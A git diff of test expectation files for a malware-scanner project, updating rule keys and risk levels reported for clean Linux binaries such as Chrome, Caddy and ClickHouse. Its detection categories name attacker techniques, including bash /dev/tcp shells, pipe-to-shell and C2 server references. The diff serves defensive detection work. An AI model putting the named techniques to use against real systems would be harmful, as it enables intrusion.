-| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|--------|--------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------|
+| HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
+| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy ELF binary (>7.4) | |
+| HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | |
+| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) |
+| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
+| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) |
diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple
index 21880ef60..4a34603df 100644
--- a/tests/linux/clean/appsec-rules.json.simple
+++ b/tests/linux/clean/appsec-rules.json.simple
@@ -19,16 +19,16 @@ data/compression/bzip2: low
data/compression/lzma: low
data/compression/zstd: low
data/encoding/base64: low
-discover/system/network: high
+discover/multiple: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/iptables: medium
evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
evasion/process_injection/readelf: medium
exec/plugin: low
-exec/shell/bash_dev_tcp: high
exec/shell/bash_dev_udp: medium
exec/shell/nohup: medium
exec/system_controls/apparmor: medium
@@ -54,6 +54,7 @@ impact/exploit/cve: medium
impact/remote_access/iptables: medium
net/dns/servers: low
net/download: medium
+net/ftp/t: low
net/http/cookies: medium
net/socket/connect: medium
net/tcp/sftp: medium
diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple
index 9c9a4fa2a..d289770c8 100644
--- a/tests/linux/clean/busybox.simple
+++ b/tests/linux/clean/busybox.simple
@@ -8,10 +8,12 @@ data/compression/lzma: low
data/encoding/base64: low
data/random/insecure: low
discover/group/lookup: medium
-discover/network/interface_get: low
+discover/network/interface: low
discover/network/netstat: medium
+discover/process/parent: low
discover/processes/pgrep: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dmesg: low
discover/system/platform: low
discover/system/sysinfo: medium
discover/user/HOME: low
@@ -88,5 +90,4 @@ process/executable_path: low
process/groupid_set: low
process/groups_set: low
process/namespace_set: low
-process/parent_pid_get: low
process/userid_set: low
diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple
index 5ee09852f..fa1845840 100644
--- a/tests/linux/clean/caddy.simple
+++ b/tests/linux/clean/caddy.simple
@@ -38,14 +38,15 @@ discover/cloud/aws_metadata: low
discover/cloud/google_metadata: low
discover/group/lookup: medium
discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/parent: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/conditional/LANG: low
exec/install_additional/package_install: medium
@@ -147,6 +148,5 @@ persist/pid_file: medium
privesc/sudo: medium
process/chroot: low
process/groups_set: low
-process/parent_pid_get: low
sus/exclamation: medium
sus/intercept: medium
diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple
index c2698a743..97c25b8fa 100644
--- a/tests/linux/clean/chezmoi.simple
+++ b/tests/linux/clean/chezmoi.simple
@@ -46,14 +46,15 @@ data/hash/md5: low
data/random/insecure: low
discover/group/lookup: medium
discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/parent: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/conditional/LANG: low
exec/plugin: low
@@ -153,7 +154,6 @@ privesc/sudo: medium
process/chdir: low
process/chroot: low
process/groups_set: low
-process/parent_pid_get: low
sus/exclamation: medium
sus/intercept: medium
sus/malicious: medium
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index ef7e5ac8b..4dbc704d1 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -6,9 +6,9 @@ anti-behavior/LD_PROFILE: medium
anti-static/obfuscation/obfuscate: low
c2/addr/http_dynamic: medium
c2/addr/ip: medium
+c2/addr/server: medium
c2/discovery/ip_dns_resolver: medium
c2/refs: medium
-c2/server_address: medium
c2/tool_transfer/dropper: medium
collect/archives/zip: medium
collect/databases/leveldb: medium
@@ -38,14 +38,17 @@ data/hash/sha1: low
data/random/insecure: low
discover/network/interface_list: medium
discover/network/mac_address: medium
+discover/process/name: medium
+discover/process/parent: low
+discover/process/runtime_deps: medium
discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/system/platform: low
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: medium
+evasion/file/location/dev_shm: medium
evasion/hijack_execution/LD_LIBRARY_PATH: low
evasion/process_injection/ptrace: medium
exec/cmd: medium
@@ -109,7 +112,6 @@ fs/watch: low
hw/cpu: medium
hw/dev/block_ice: medium
hw/wireless: low
-impact/exploit/GCONV_PATH: low
impact/ransom/decryptor: medium
impact/remote_access/heartbeat: medium
lateral/scan/target_ip: medium
@@ -162,9 +164,6 @@ process/chroot: low
process/create: low
process/groups_set: low
process/multithreaded: low
-process/name_get: medium
-process/parent_pid_get: low
-process/thread_local_storage: low
process/userid_set: low
sus/exclamation: medium
sus/intercept: medium
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index 9dc863651..bd77a7ee6 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
@@ -6,8 +6,8 @@
anti-static/obfuscation/obfuscate: low
c2/addr/http_dynamic: medium
c2/addr/ip: medium
+c2/addr/server: medium
c2/discovery/dyndns: medium
-c2/server_address: medium
c2/tool_transfer/download: medium
c2/tool_transfer/grayware: high
collect/databases/leveldb: medium
@@ -42,20 +42,22 @@ data/hash/sha256: low
data/hash/whirlpool: medium
data/random/insecure: low
discover/cloud/google_metadata: low
-discover/network/interface_get: low
+discover/network/interface: low
discover/network/interface_list: medium
discover/permissions/capabilities: medium
+discover/process/name: medium
+discover/process/runtime_deps: medium
discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: low
evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/relative_hidden: low
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: medium
evasion/hijack_execution/DYLD_LIBRARY_PATH: medium
evasion/hijack_execution/LD_LIBRARY_PATH: low
evasion/logging/acct: low
@@ -69,6 +71,7 @@ exec/install_additional/package_install: medium
exec/plugin: low
exec/program: medium
exec/program/background: low
+exec/program/hidden: medium
exec/shell/SHELL: low
exec/shell/TERM: low
exec/shell/background_sleep: medium
@@ -181,8 +184,6 @@ process/create: low
process/executable_path: low
process/groupid_set: low
process/multithreaded: low
-process/name_get: medium
-process/thread_local_storage: low
process/userid_set: low
sus/exclamation: medium
sus/intercept: medium
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index e15d38abd..8b39a12e5 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -2,7 +2,7 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|--------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [http://arianna.libero.it/search/abin/integrata.cgi?query=](http://arianna.libero.it/search/abin/integrata.cgi?query=)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.goo.ne.jp/sgt.jsp?MT=](http://search.goo.ne.jp/sgt.jsp?MT=)
[http://search.goo.ne.jp/web.jsp?MT=](http://search.goo.ne.jp/web.jsp?MT=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.goo.ne.jp/sgt.jsp?MT=](https://search.goo.ne.jp/sgt.jsp?MT=)
[https://search.goo.ne.jp/web.jsp?MT=](https://search.goo.ne.jp/web.jsp?MT=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[https://search.yahoo.com?fr=crmas_sfp](https://search.yahoo.com?fr=crmas_sfp)
[https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=](https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=) |
+| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) |
| MEDIUM | [3P/threat_hunting/google_remote_desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) |
| MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) |
| MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | Checks if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) |
@@ -11,9 +11,9 @@
| MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) |
| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s) |
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) |
| MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) |
| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) |
| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) |
| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) |
| MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) |
@@ -26,6 +26,8 @@
| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) |
| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) |
+| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
+| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) |
| MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) |
| MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) |
@@ -33,6 +35,7 @@
| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) |
| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
+| MEDIUM | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) |
| MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) |
| MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) |
| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) |
@@ -59,6 +62,7 @@
| MEDIUM | [impact/ransom/decryptor](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ransom/decryptor.yara#decryptor) | References 'decryptor' | [decryptor](https://github.com/search?q=decryptor&type=code) |
| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) |
| MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) |
+| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
| MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) |
| MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) |
| MEDIUM | [net/http/content_length_0](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) |
@@ -81,7 +85,6 @@
| MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) |
| MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) |
| MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) |
-| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
